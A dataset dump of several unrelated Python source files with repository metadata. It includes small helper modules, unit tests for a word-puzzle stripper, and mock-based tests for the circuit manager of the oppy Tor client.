c40ee1fbf7ec3815b1828bf85041c1f54432be06 | 29 | py | Python | ubadkhabad.py | Divyanshi0409/Python-Programs | 7fb8ab2159cc69de7168bf19f91325b9c7a908c7 | [
"MIT"
] | null | null | null | ubadkhabad.py | Divyanshi0409/Python-Programs | 7fb8ab2159cc69de7168bf19f91325b9c7a908c7 | [
"MIT"
] | null | null | null | ubadkhabad.py | Divyanshi0409/Python-Programs | 7fb8ab2159cc69de7168bf19f91325b9c7a908c7 | [
"MIT"
] | null | null | null | print("Junaid is pagal,dumb") | 29 | 29 | 0.758621 | 5 | 29 | 4.4 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.068966 | 29 | 1 | 29 | 29 | 0.814815 | 0 | 0 | 0 | 0 | 0 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
c42cf9a5dfa294fed23f30280732cb2ea7045b95 | 22 | py | Python | apscrypt/__init__.py | Sellig6792/APSCrypt | cfff9c17100237d9197ba2c372a01946d9c419a8 | [
"MIT"
] | 1 | 2021-09-19T15:02:40.000Z | 2021-09-19T15:02:40.000Z | apscrypt/__init__.py | Sellig6792/APSCrypt | cfff9c17100237d9197ba2c372a01946d9c419a8 | [
"MIT"
] | null | null | null | apscrypt/__init__.py | Sellig6792/APSCrypt | cfff9c17100237d9197ba2c372a01946d9c419a8 | [
"MIT"
] | null | null | null | from .crypt import *
| 11 | 21 | 0.681818 | 3 | 22 | 5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.227273 | 22 | 1 | 22 | 22 | 0.882353 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
c440fa689671b85484c4d3e4f405145767aac69a | 101 | py | Python | src/layers/__init__.py | jwspaeth/MIT-9.520-Project | 5076e01f230196b99c7bede0632b72152783d17d | [
"MIT"
] | null | null | null | src/layers/__init__.py | jwspaeth/MIT-9.520-Project | 5076e01f230196b99c7bede0632b72152783d17d | [
"MIT"
] | null | null | null | src/layers/__init__.py | jwspaeth/MIT-9.520-Project | 5076e01f230196b99c7bede0632b72152783d17d | [
"MIT"
] | null | null | null | from .LocallyConnected1d import LocallyConnected1d
from .LocallyConnected2d import LocallyConnected2d | 50.5 | 50 | 0.910891 | 8 | 101 | 11.5 | 0.5 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.042553 | 0.069307 | 101 | 2 | 51 | 50.5 | 0.93617 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
c46389ae0c06c26546bc9f1309075f02e670e59f | 93 | py | Python | utils/euclidean_distance.py | devbas/aml-quora | da343ff3499566da082e12329e6228a1d9b34a7a | [
"MIT"
] | null | null | null | utils/euclidean_distance.py | devbas/aml-quora | da343ff3499566da082e12329e6228a1d9b34a7a | [
"MIT"
] | null | null | null | utils/euclidean_distance.py | devbas/aml-quora | da343ff3499566da082e12329e6228a1d9b34a7a | [
"MIT"
] | null | null | null | import numpy as np
def euclidean_distance(x, y):
return np.sqrt(np.sum(np.square(x - y))) | 31 | 44 | 0.698925 | 18 | 93 | 3.555556 | 0.722222 | 0.0625 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.150538 | 93 | 3 | 44 | 31 | 0.810127 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 6 |
6712b3a9504da80b58aaa1b4eb4c913ec5a7e8f8 | 155 | py | Python | tests/exceptions.py | mazi76erX2/mention-python | 5133f463faa4ef053365fbf15db0a75dbb00a4e5 | [
"MIT"
] | 4 | 2019-04-20T16:32:46.000Z | 2021-10-30T14:14:25.000Z | tests/exceptions.py | mazi76erX2/mention-python | 5133f463faa4ef053365fbf15db0a75dbb00a4e5 | [
"MIT"
] | null | null | null | tests/exceptions.py | mazi76erX2/mention-python | 5133f463faa4ef053365fbf15db0a75dbb00a4e5 | [
"MIT"
] | 3 | 2017-10-11T16:04:23.000Z | 2020-10-26T15:04:09.000Z | class InvalidResponseException(Exception):
pass
class InvalidEndpointException(Exception):
pass
class InvalidURLException(Exception):
pass
| 14.090909 | 42 | 0.780645 | 12 | 155 | 10.083333 | 0.5 | 0.322314 | 0.297521 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.16129 | 155 | 10 | 43 | 15.5 | 0.930769 | 0 | 0 | 0.5 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.5 | 0 | 0 | 0.5 | 0 | 1 | 0 | 1 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 6 |
671f5d748222c4163133fd48cbd6e0bdfebd6aac | 18 | py | Python | build/lib/ESINet/viz/__init__.py | The-Platypus/ESINet | b9b4e8ed8c6a0fa6d082e303014859a054233fd4 | [
"MIT"
] | null | null | null | build/lib/ESINet/viz/__init__.py | The-Platypus/ESINet | b9b4e8ed8c6a0fa6d082e303014859a054233fd4 | [
"MIT"
] | null | null | null | build/lib/ESINet/viz/__init__.py | The-Platypus/ESINet | b9b4e8ed8c6a0fa6d082e303014859a054233fd4 | [
"MIT"
] | null | null | null | from .viz import * | 18 | 18 | 0.722222 | 3 | 18 | 4.333333 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.166667 | 18 | 1 | 18 | 18 | 0.866667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
676149be7d9706286573982d874a52cedb96bc88 | 186 | py | Python | erpnext_chinese/monkey_patches/utils.py | eanfs/erpnext_chinese | 68c22267b37553092955f2c3c14d35cfdbb79873 | [
"MIT"
] | null | null | null | erpnext_chinese/monkey_patches/utils.py | eanfs/erpnext_chinese | 68c22267b37553092955f2c3c14d35cfdbb79873 | [
"MIT"
] | null | null | null | erpnext_chinese/monkey_patches/utils.py | eanfs/erpnext_chinese | 68c22267b37553092955f2c3c14d35cfdbb79873 | [
"MIT"
] | 1 | 2022-01-27T01:20:08.000Z | 2022-01-27T01:20:08.000Z | from frappe import utils
#因网络问题导致获取用户图像超时,故取消此功能,详见https://gitee.com/yuzelin/erpnext-chinese-docs/issues/I3PXHV
def has_gravatar(email):
return ''
utils.has_gravatar = has_gravatar | 26.571429 | 86 | 0.801075 | 25 | 186 | 5.84 | 0.8 | 0.226027 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005917 | 0.091398 | 186 | 7 | 87 | 26.571429 | 0.857988 | 0.456989 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0.25 | 0.25 | 0.75 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
677ac9b89a92c1538d1180a192c654cb0311d5c7 | 4,171 | py | Python | tests/test_word_stripper.py | donkirkby/sliced_art | f462ba1fdb0959c7db4de1e3e9dadc368b1df206 | [
"MIT"
] | null | null | null | tests/test_word_stripper.py | donkirkby/sliced_art | f462ba1fdb0959c7db4de1e3e9dadc368b1df206 | [
"MIT"
] | 5 | 2020-02-08T17:23:40.000Z | 2021-03-27T19:27:05.000Z | tests/test_word_stripper.py | donkirkby/sliced_art | f462ba1fdb0959c7db4de1e3e9dadc368b1df206 | [
"MIT"
] | null | null | null | from sliced_art.word_stripper import WordStripper
def test_display():
all_words = 'lots of words rail the liar sail lairs of lira rails'.split()
word_stripper = WordStripper(all_words)
target_letter = 'r'
word_stripper[target_letter] = 'rails'
expected_display = 'sail+R -- rail+S, liar+S, lira+S'
display = word_stripper.make_display(target_letter)
assert display == expected_display
def test_unknown_word():
all_words = 'lots of words rail the liar sail lairs of lira rails'.split()
word_stripper = WordStripper(all_words)
target_letter = 'i'
word_stripper[target_letter] = 'rails'
expected_display = 'rals?I -- rail+S, liar+S, sail+R, lira+S'
display = word_stripper.make_display(target_letter)
assert display == expected_display
def test_word_needed():
all_words = 'lots of words rail the liar sail lairs of lira rails'.split()
word_stripper = WordStripper(all_words)
target_letter = 'i'
word_stripper[target_letter] = ''
expected_display = 'I word needed'
display = word_stripper.make_display(target_letter)
assert display == expected_display
def test_wrong_letter():
all_words = 'lots of words rail the liar sail lairs of lira rails'.split()
word_stripper = WordStripper(all_words)
target_letter = 'i'
word_stripper[target_letter] = 'food'
expected_display = 'I word needed'
display = word_stripper.make_display(target_letter)
assert display == expected_display
def test_upper_case_word():
all_words = 'no glib content big man'.split()
word_stripper = WordStripper(all_words)
target_letter = 'l'
word_stripper[target_letter] = 'GLIB'
expected_display = 'big+L'
display = word_stripper.make_display(target_letter)
assert display == expected_display
def test_upper_case_letter():
all_words = 'no glib content big man'.split()
word_stripper = WordStripper(all_words)
target_letter = 'L'
word_stripper[target_letter] = 'glib'
expected_display = 'big+L'
display = word_stripper.make_display(target_letter)
assert display == expected_display
def test_line_feeds():
all_words = '''\
no
glib
content
big
man
'''.splitlines(keepends=True)
word_stripper = WordStripper(all_words)
target_letter = 'l'
word_stripper[target_letter] = 'glib'
expected_display = 'big+L'
display = word_stripper.make_display(target_letter)
assert display == expected_display
def test_letter_clues():
all_words = 'let me tell a tale of a bland land'.split()
word_stripper = WordStripper(all_words, min_words=2)
word_stripper['a'] = 'tale'
expected_clues = dict(a='A', b='B')
clues = word_stripper.make_clues()
assert clues == expected_clues
def test_word_clues():
all_words = 'let me tell a tale of a bland land'.split()
word_stripper = WordStripper(all_words, min_words=2)
word_stripper['a'] = 'tale'
word_stripper['b'] = 'bland'
expected_clues = dict(a='TALE', b='BLAND')
clues = word_stripper.make_clues()
assert clues == expected_clues
def test_make_clues_upper_case_letters():
all_words = 'let me tell a tale of a bland land'.split()
word_stripper = WordStripper(all_words, min_words=2)
word_stripper['A'] = 'tale'
word_stripper['B'] = 'bland'
expected_clues = dict(a='TALE', b='BLAND')
clues = word_stripper.make_clues()
assert clues == expected_clues
def test_change_word():
all_words = 'let me tell a tale of a bland land'.split()
word_stripper = WordStripper(all_words, min_words=2)
target_letter = 'a'
word_stripper[target_letter] = 'late'
word_stripper[target_letter] = 'tale'
expected_display = 'let+A'
display = word_stripper.make_display(target_letter)
assert display == expected_display
def test():
all_words = 'let me tell a tale of a bland land'.split()
word_stripper = WordStripper(all_words, min_words=2)
target_letter = ''
word_stripper[target_letter] = 'let'
expected_display = 'tell-L, tale-A'
display = word_stripper.make_display(target_letter)
assert display == expected_display
| 25.432927 | 78 | 0.704867 | 570 | 4,171 | 4.877193 | 0.110526 | 0.172662 | 0.103597 | 0.116547 | 0.869784 | 0.869784 | 0.869784 | 0.83705 | 0.83705 | 0.83705 | 0 | 0.001485 | 0.19276 | 4,171 | 163 | 79 | 25.588957 | 0.824176 | 0 | 0 | 0.631068 | 0 | 0 | 0.161592 | 0 | 0 | 0 | 0 | 0 | 0.116505 | 1 | 0.116505 | false | 0 | 0.009709 | 0 | 0.126214 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
6792321f3db3df0e42c3a9532e449553fad4645b | 224 | py | Python | pynano/checkers/__init__.py | isidentical/pynano | 29ece35782cacfb3cfcf35bf9b50e6a11cf44d34 | [
"MIT"
] | 2 | 2019-09-15T16:26:32.000Z | 2019-09-15T17:20:40.000Z | pynano/checkers/__init__.py | pynano/pynano | 29ece35782cacfb3cfcf35bf9b50e6a11cf44d34 | [
"MIT"
] | null | null | null | pynano/checkers/__init__.py | pynano/pynano | 29ece35782cacfb3cfcf35bf9b50e6a11cf44d34 | [
"MIT"
] | null | null | null | from pynano.checkers.checker import CHECKERS, NanoSyntaxError, SyntaxChecker
from pynano.checkers.strict import NotAllowedError, StrictSubsetChecker
from pynano.checkers.type import VALID_TYPES, NanoTypeError, TypeValidator
| 56 | 76 | 0.875 | 24 | 224 | 8.125 | 0.625 | 0.153846 | 0.276923 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.075893 | 224 | 3 | 77 | 74.666667 | 0.942029 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
67990ed56be8b4ce99c99e387d4017e6522eda95 | 33 | py | Python | tests/operators/conftest.py | angelneo/http | 850ad937bcaa917743ce9b476ca7d0ff337c243f | [
"MIT"
] | 10 | 2017-03-27T08:34:22.000Z | 2019-11-20T01:02:12.000Z | tests/operators/conftest.py | angelneo/http | 850ad937bcaa917743ce9b476ca7d0ff337c243f | [
"MIT"
] | 7 | 2017-03-20T01:38:57.000Z | 2019-02-12T14:33:26.000Z | tests/operators/conftest.py | grappa-python/http | 0de893e02b98282270d6daa8c48d65d0269b371f | [
"MIT"
] | 5 | 2017-04-09T15:41:54.000Z | 2020-12-18T10:17:33.000Z | from ..conftest import * # noqa
| 16.5 | 32 | 0.666667 | 4 | 33 | 5.5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.212121 | 33 | 1 | 33 | 33 | 0.846154 | 0.121212 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
67ce0d92034f71c96a8e965173c68e6445d1be29 | 31 | py | Python | techrachit.py | eastmest/Termux-Megapackage | 08f610d25539cfdc5992893996aa4c89630c9a07 | [
"MIT"
] | null | null | null | techrachit.py | eastmest/Termux-Megapackage | 08f610d25539cfdc5992893996aa4c89630c9a07 | [
"MIT"
] | null | null | null | techrachit.py | eastmest/Termux-Megapackage | 08f610d25539cfdc5992893996aa4c89630c9a07 | [
"MIT"
] | null | null | null | print ("tech rachit are here")
| 15.5 | 30 | 0.709677 | 5 | 31 | 4.4 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.16129 | 31 | 1 | 31 | 31 | 0.846154 | 0 | 0 | 0 | 0 | 0 | 0.645161 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
67da37e0ce30cd0f169b342f278180f371afb21a | 19,440 | py | Python | oppy/tests/unit/circuit/test_circuitmanager.py | nskinkel/oppy | 68c84146da5d7d994fd55ead5df747c93c95a2f5 | [
"BSD-3-Clause"
] | 25 | 2015-01-08T04:37:40.000Z | 2021-07-21T15:06:35.000Z | oppy/tests/unit/circuit/test_circuitmanager.py | nskinkel/oppy | 68c84146da5d7d994fd55ead5df747c93c95a2f5 | [
"BSD-3-Clause"
] | 72 | 2015-01-08T04:38:13.000Z | 2017-06-18T14:35:50.000Z | oppy/tests/unit/circuit/test_circuitmanager.py | nskinkel/oppy | 68c84146da5d7d994fd55ead5df747c93c95a2f5 | [
"BSD-3-Clause"
] | 4 | 2015-01-20T22:17:45.000Z | 2018-05-23T09:15:04.000Z | import mock
from twisted.trial import unittest
from oppy.circuit.circuitmanager import CircuitManager
from oppy.circuit.definitions import (
CircuitType,
DEFAULT_OPEN_IPv4,
DEFAULT_OPEN_IPv6,
)
from oppy.path.path import Path
ID = 0
class CircuitManagerTest(unittest.TestCase):
@mock.patch('oppy.connection.connectionmanager.ConnectionManager',
autospec=True)
@mock.patch('oppy.netstatus.netstatus.NetStatus', autospec=True)
def setUp(self, ns, cp,):
self.ns = ns
self.cp = cp
self.cm = CircuitManager(cp, ns, autobuild=False)
@mock.patch('oppy.stream.stream.Stream', autospec=True)
def test_getOpenCircuit_open_circuit(self, mock_stream):
c = mock.Mock()
r = mock.Mock()
mock_stream.request = r
self.cm._getOpenCandidates = mock.Mock()
self.cm._getOpenCandidates.return_value = [c]
self.cm._buildCircuit = mock.Mock()
self.cm._pending_stream_list = []
d = self.cm.getOpenCircuit(mock_stream)
self.assertEqual(self.successResultOf(d), c)
self.cm._getOpenCandidates.assert_called_once_with(r)
self.assertEqual(self.cm._buildCircuit.call_count, 0)
self.assertEqual(self.cm._pending_stream_list, [])
# TODO: test that the specific correct stream is added to pending list
@mock.patch('oppy.stream.stream.Stream', autospec=True)
def test_getOpenCircuit_pending_circuit(self, mock_stream):
c = mock.Mock()
r = mock.Mock()
mock_stream.request = r
self.cm._getOpenCandidates = mock.Mock()
self.cm._getOpenCandidates.return_value = []
self.cm._getPendingCandidates = mock.Mock()
self.cm._getPendingCandidates.return_value = [c]
self.cm._buildCircuit = mock.Mock()
self.cm._pending_stream_list = []
_ = self.cm.getOpenCircuit(mock_stream)
self.cm._getOpenCandidates.assert_called_once_with(r)
self.cm._getPendingCandidates.assert_called_once_with(r)
self.assertEqual(self.cm._buildCircuit.call_count, 0)
self.assertEqual(len(self.cm._pending_stream_list), 1)
# TODO: test _buildCircuit is called with correct args
# test specific correct stream added to pending streams
@mock.patch('oppy.stream.stream.Stream', autospec=True)
def test_getOpenCircuit_no_circuit(self, mock_stream):
r = mock.Mock()
mock_stream.request = r
self.cm._getOpenCandidates = mock.Mock()
self.cm._getOpenCandidates.return_value = []
self.cm._getPendingCandidates = mock.Mock()
self.cm._getPendingCandidates.return_value = []
self.cm._buildCircuit = mock.Mock()
self.cm._pending_stream_list = []
_ = self.cm.getOpenCircuit(mock_stream)
self.cm._getOpenCandidates.assert_called_once_with(r)
self.cm._getPendingCandidates.assert_called_once_with(r)
self.assertEqual(self.cm._buildCircuit.call_count, 1)
self.assertEqual(len(self.cm._pending_stream_list), 1)
def test_shouldDestroyCircuit_ipv4_yes(self):
c = mock.Mock()
c.circuit_type = CircuitType.IPv4
self.cm._totalIPv4Count = mock.Mock()
self.cm._totalIPv4Count.return_value = DEFAULT_OPEN_IPv4+2
self.assertTrue(self.cm.shouldDestroyCircuit(c))
def test_shouldDestroyCircuit_ipv4_no(self):
c = mock.Mock()
c.circuit_type = CircuitType.IPv4
self.cm._totalIPv4Count = mock.Mock()
self.cm._totalIPv4Count.return_value = DEFAULT_OPEN_IPv4
self.assertFalse(self.cm.shouldDestroyCircuit(c))
def test_shouldDestroyCircuit_ipv6_yes(self):
c = mock.Mock()
c.circuit_type = CircuitType.IPv6
self.cm._totalIPv6Count = mock.Mock()
self.cm._totalIPv6Count.return_value = DEFAULT_OPEN_IPv6+2
self.assertTrue(self.cm.shouldDestroyCircuit(c))
def test_shouldDestroyCircuit_ipv6_no(self):
c = mock.Mock()
c.circuit_type = CircuitType.IPv6
self.cm._totalIPv6Count = mock.Mock()
self.cm._totalIPv6Count.return_value = DEFAULT_OPEN_IPv6
self.assertFalse(self.cm.shouldDestroyCircuit(c))
def test_circuitDestroyed_open(self):
c = mock.Mock()
c.circuit_id = 10
self.cm._open_circuit_dict[10] = c
self.cm._assignAllPossiblePendingRequests = mock.Mock()
self.cm._buildCircuitsForOrphanedPendingRequests = mock.Mock()
self.cm._replenishCircuits = mock.Mock()
self.cm.circuitDestroyed(c)
self.assertTrue(c not in self.cm._open_circuit_dict.values())
self.assertEqual(self.cm._assignAllPossiblePendingRequests.call_count,
1)
self.assertEqual(
self.cm._buildCircuitsForOrphanedPendingRequests.call_count,
1)
self.assertEqual(self.cm._replenishCircuits.call_count, 1)
def test_circuitDestroyed_pending(self):
c = mock.Mock()
c.circuit_id = 10
self.cm._circuit_build_task_dict[10] = c
self.cm._assignAllPossiblePendingRequests = mock.Mock()
self.cm._buildCircuitsForOrphanedPendingRequests = mock.Mock()
self.cm._replenishCircuits = mock.Mock()
self.cm.circuitDestroyed(c)
self.assertTrue(c not in self.cm._circuit_build_task_dict.values())
self.assertEqual(self.cm._assignAllPossiblePendingRequests.call_count,
1)
self.assertEqual(
self.cm._buildCircuitsForOrphanedPendingRequests.call_count,
1)
self.assertEqual(self.cm._replenishCircuits.call_count, 1)
@mock.patch('oppy.circuit.circuitmanager.logging', autospec=True)
def test_circuitDestroyed_no_reference(self, mock_logging):
c = mock.Mock()
c.circuit_id = 10
self.cm._assignAllPossiblePendingRequests = mock.Mock()
self.cm._buildCircuitsForOrphanedPendingRequests = mock.Mock()
self.cm._replenishCircuits = mock.Mock()
self.cm.circuitDestroyed(c)
self.assertTrue(mock_logging.debug.called)
self.assertFalse(self.cm._assignAllPossiblePendingRequests.called)
self.assertFalse(
self.cm._buildCircuitsForOrphanedPendingRequests.called)
self.assertFalse(self.cm._replenishCircuits.called)
def test_circuitOpened(self):
c = mock.Mock()
c.circuit_id = 10
self.cm._assignPossiblePendingRequestsToCircuit = mock.Mock()
self.cm._notifyUserCircuitOpened = mock.Mock()
self.cm._circuit_build_task_dict[10] = c
self.cm.circuitOpened(c)
self.assertTrue(c not in self.cm._circuit_build_task_dict.values())
self.assertTrue(c in self.cm._open_circuit_dict.values())
self.assertEqual(
self.cm._assignPossiblePendingRequestsToCircuit.call_count, 1)
self.assertEqual(self.cm._notifyUserCircuitOpened.call_count, 1)
@mock.patch('oppy.circuit.circuitmanager.logging', autospec=True)
def test_circuitOpened_no_reference(self, mock_logging):
c = mock.Mock()
c.circuit_id = 10
self.cm._assignPossiblePendingRequestsToCircuit = mock.Mock()
self.cm._notifyUserCircuitOpened = mock.Mock()
self.cm.circuitOpened(c)
self.assertTrue(c not in self.cm._open_circuit_dict.values())
self.assertFalse(
self.cm._assignPossiblePendingRequestsToCircuit.called)
self.assertFalse(self.cm._notifyUserCircuitOpened.called)
self.assertEqual(mock_logging.debug.call_count, 2)
def test_destroyAllCircuits_with_streams(self):
mock_stream = mock.Mock()
self.cm._pending_stream_list = [mock_stream]
mock_open_circuit = mock.Mock()
self.cm._open_circuit_dict = {1: mock_open_circuit}
mock_circuit_build_task = mock.Mock()
self.cm._circuit_build_task_dict = {2: mock_circuit_build_task}
self.cm.destroyAllCircuits()
self.assertEqual(len(self.cm._pending_stream_list), 0)
self.assertEqual(
mock_open_circuit.destroyCircuitFromManager.call_count, 1)
self.assertEqual(
mock_circuit_build_task.destroyCircuitFromManager.call_count,
1)
def test_destroyAllCircuits_without_streams(self):
mock_stream = mock.Mock()
self.cm._pending_stream_list = [mock_stream]
mock_open_circuit = mock.Mock()
self.cm._open_circuit_dict = {1: mock_open_circuit}
mock_circuit_build_task = mock.Mock()
self.cm._circuit_build_task_dict = {2: mock_circuit_build_task}
self.cm.destroyAllCircuits(destroy_pending_streams=False)
self.assertTrue(mock_stream in self.cm._pending_stream_list)
self.assertEqual(
mock_open_circuit.destroyCircuitFromManager.call_count, 1)
self.assertEqual(
mock_circuit_build_task.destroyCircuitFromManager.call_count,
1)
def test_buildCircuitsForOrphanedRequests(self):
mock_stream = mock.Mock()
mock_stream.request = mock.Mock()
self.cm._pending_stream_list = [mock_stream]
self.cm._getPendingCandidates = mock.Mock()
self.cm._getPendingCandidates.return_value = []
self.cm._buildCircuitsForPendingStreams = mock.Mock()
self.cm._buildCircuitsForOrphanedPendingRequests()
self.cm._buildCircuitsForPendingStreams.assert_called_once_with(
[mock_stream])
@mock.patch('oppy.circuit.circuitmanager.logging', autospec=True)
def test_notifyUserCircuitOpened_not_notified_yet(self, mock_logging):
self.cm._sent_open_message = False
self.cm._notifyUserCircuitOpened()
self.assertEqual(mock_logging.info.call_count, 1)
self.assertTrue(self.cm._sent_open_message)
@mock.patch('oppy.circuit.circuitmanager.logging', autospec=True)
def test_notifyUserCircuitOpened_notified_already(self, mock_logging):
self.cm._sent_open_message = True
self.cm._notifyUserCircuitOpened()
self.assertEqual(mock_logging.info.call_count, 0)
self.assertTrue(self.cm._sent_open_message)
@mock.patch('oppy.circuit.circuitmanager.PendingStream', autospec=True)
def test_assignPossiblePendingRequestsToCircuit_yes(self,
mock_pending_stream):
mock_request = mock.Mock()
mock_deferred = mock.Mock()
mock_pending_stream.stream.request = mock_request
mock_pending_stream.deferred = mock_deferred
mock_circuit = mock.Mock()
mock_circuit.canHandleRequest = mock.Mock()
mock_circuit.canHandleRequest.return_value = True
self.cm._pending_stream_list = [mock_pending_stream]
self.cm._assignPossiblePendingRequestsToCircuit(mock_circuit)
mock_circuit.canHandleRequest.assert_called_once_with(mock_request)
mock_deferred.callback.assert_called_once_with(mock_circuit)
self.assertTrue(mock_pending_stream not in
self.cm._pending_stream_list)
self.assertEqual(len(self.cm._pending_stream_list), 0)
@mock.patch('oppy.circuit.circuitmanager.PendingStream', autospec=True)
def test_assignPossiblePendingRequests_none(self, mock_pending_stream):
mock_request = mock.Mock()
mock_deferred = mock.Mock()
mock_pending_stream.stream.request = mock_request
mock_pending_stream.deferred = mock_deferred
mock_circuit = mock.Mock()
mock_circuit.canHandleRequest = mock.Mock()
mock_circuit.canHandleRequest.return_value = False
self.cm._pending_stream_list = [mock_pending_stream]
self.cm._assignPossiblePendingRequestsToCircuit(mock_circuit)
mock_circuit.canHandleRequest.assert_called_once_with(mock_request)
self.assertEqual(mock_deferred.callback.call_count, 0)
self.assertTrue(mock_pending_stream in
self.cm._pending_stream_list)
self.assertEqual(len(self.cm._pending_stream_list), 1)
@mock.patch('oppy.circuit.circuitmanager.PendingStream', autospec=True)
def test_assignAllPossiblePendingRequests(self, mock_pending_stream):
mock_circuit_1 = mock.Mock()
mock_circuit_2 = mock.Mock()
self.cm._open_circuit_dict = {1: mock_circuit_1, 2: mock_circuit_2}
self.cm._assignPossiblePendingRequestsToCircuit = mock.Mock()
self.cm._assignAllPossiblePendingRequests()
self.assertEqual(
self.cm._assignPossiblePendingRequestsToCircuit.call_count, 2)
@mock.patch('oppy.circuit.circuitmanager.CircuitBuildTask', autospec=True)
def test_buildCircuit(self, mock_circuit_build_task):
self.cm._buildCircuit()
self.assertEqual(mock_circuit_build_task.call_count, 1)
self.assertEqual(len(self.cm._circuit_build_task_dict), 1)
def test_buildCircuits(self):
self.cm._buildCircuit = mock.Mock()
self.cm._buildCircuits(5)
self.assertEqual(self.cm._buildCircuit.call_count, 5)
def test_buildCircuitsForPendingStreams(self):
mock_pending_stream = mock.Mock()
mock_request = mock.Mock()
mock_pending_stream.request = mock_request
self.cm._buildCircuit = mock.Mock()
self.cm._buildCircuitsForPendingStreams([mock_pending_stream])
